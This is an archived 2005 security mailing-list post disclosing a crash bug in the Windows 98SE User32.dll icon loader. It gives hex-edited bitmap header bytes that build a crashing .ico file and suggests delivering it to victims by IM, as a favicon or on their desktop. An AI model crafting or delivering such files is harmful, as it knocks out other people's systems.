Network Security Vuln-Dev

User32.dll Icon Size Crash

Subject: User32.dll Icon Size Crash
Date: Wed, 25 May 2005 16:18:23 -0300
Andres Rey  - (User32.dll Icon Size Crash)


---------------------------------------------------

Application: User32.dll (Windows 98SE Version (4.10.2222)) (Maybe other
Windows versions too)
Bug: Crash the program that attempts to open the icon
Exploitation: Local / Remote*
Author: Andres Rey (andreskrey@gmail.com)

(* Can only sometimes be used as a remote exploit; see point 5)

---------------------------------------------------

1) Introduction
2) Bug
3) PoC
4) Making the exploit
5) Examples of the Real Life
6) Disclosure

---------------------------------------------------


==============
1) Introduction
==============


User32.dll Is a core component of the Windows kernel


==============
2) Bug
==============


The bug is (probably) in the LoadIconA function of user32.dll. When it reads
a bitmap with the extension .ico and it has a large size (65535x65535), the
DLL crashes, and the program that called the function gets killed.


==============
3) PoC
==============


The attached file is a zip with the bitmap/icon compressed. Just decompress
it to a folder and open it (Explorer.exe will crash), or open it with any
program that can load an icon (the program will crash).

WARNING!: Don't decompress it to the desktop!!, or your explorer.exe will crash
and crash and crash until you delete the icon.


==============
4) Making the exploit
==============


Just open a bitmap in a hex editor and modify the width and height data:

Locate the "XXXX" values...

----------------------------------------------------------------------------
00000000  :  424D 38F9 1500 0000 0000 3600 0000 2800 0000 XXXX
00000010  :  0000 XXXX 0000 0100 1800 0000 0000 02F9 1500 120B
----------------------------------------------------------------------------

...and change to:

----------------------------------------------------------------------------
00000000  :  424D 38F9 1500 0000 0000 3600 0000 2800 0000 FFFF
00000010  :  0000 FFFF 0000 0100 1800 0000 0000 02F9 1500 120B
----------------------------------------------------------------------------

Then change the extension to ".ico". Notice that the system will crash. (I
use Total Commander with the icons disabled to manipulate the file.)


==============
5) Examples of the Real Life
==============


         1. Send it through IM
         2. Set it as "favicon" of the web pages (<--- Remote version)
         3. Put it on the desktop of the victim to crash the system every time
            it starts
         4. Etc.


==============
6) Disclosure
==============


Microsoft wasn't notified
(Don't know the bugs mail! Is it askbill@microsoft.com?)


----------------------------------


That's all, hope you found it useful



Andres Rey
andreskrey@gmail.com

Attachment: exploit.zip
Description: Zip compressed data
